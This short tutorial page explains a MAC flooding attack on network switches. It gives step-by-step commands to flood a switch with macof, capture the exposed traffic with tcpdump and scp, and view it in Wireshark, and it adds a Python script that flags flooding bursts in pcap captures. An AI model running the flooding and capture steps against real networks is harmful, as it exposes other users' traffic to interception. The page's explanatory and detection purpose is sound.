MAC Flooding Attack
Last modified: 2022-11-20
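MAC flooding is a technique that compromises the security of network switches: it fills the switch's MAC address table with bogus entries, so the switch falls back to forwarding frames out of every port.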
Attack Flow
-
Open Two SSH Sessions
Start SSH session 1 in terminal 1.
ssh victim@<target-ip>
Start SSH session 2 in terminal 2.
-
Flood the Switch and Capture the Traffic
In session 1, start tcpdump and keep it running.
tcpdump -A -i eth1 -w /tmp/tcpdump.pcap
In session 2, start flooding the switch (here via the "eth1" interface).
macof -i eth1
After about 30 seconds, stop macof and tcpdump.
-
Investigate the Captured Traffic
On your local machine, copy the capture file "/tmp/tcpdump.pcap" from the target machine.
scp victim@<target-ip>:/tmp/tcpdump.pcap .
Investigate this file using Wireshark.
wireshark ./tcpdump.pcap
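In a capture like this, flooding shows up as a burst of distinct source MAC addresses within a short interval. The script below is an added example, not part of the original page: it parses a classic pcap file and reports every one-second window whose count of distinct source MACs exceeds a threshold. The threshold of 100 and the sample frames built by `build_sample()` are constructed assumptions.

```python
import struct
from collections import defaultdict

def parse_pcap(data):
    """Yield (ts_sec, src_mac) for every Ethernet frame in a classic pcap file."""
    if len(data) < 24:
        raise ValueError("too short for a pcap global header")
    for endian in "<>":
        if struct.unpack(endian + "I", data[:4])[0] in (0xA1B2C3D4, 0xA1B23C4D):
            break
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:  # 1 = LINKTYPE_ETHERNET
        raise ValueError("capture is not Ethernet")
    off = 24
    while off + 16 <= len(data):
        ts_sec, _frac, incl_len, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) >= 14:  # skip records too short to hold an Ethernet header
            yield ts_sec, frame[6:12]  # bytes 6..11 are the source MAC

def flood_windows(data, threshold=100):
    """Return {second: distinct source MACs} for seconds above the threshold."""
    seen = defaultdict(set)
    for ts, src in parse_pcap(data):
        seen[ts].add(src)
    return {ts: len(m) for ts, m in sorted(seen.items()) if len(m) > threshold}

def build_sample():
    """Constructed capture: one quiet second, then 500 distinct sources in one second."""
    def rec(ts, src):
        frame = b"\xff" * 6 + src + b"\x08\x00" + b"\x00" * 46
        return struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    quiet = [rec(1000, bytes.fromhex("020000000001")) for _ in range(3)]
    burst = [rec(1001, (0x020000100000 + i).to_bytes(6, "big")) for i in range(500)]
    return hdr + b"".join(quiet + burst)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for second, count in flood_windows(data).items():
        print(f"{second}: {count} distinct source MACs")
```

Run it with the path to a capture file as the only argument; with no argument it analyses the constructed sample.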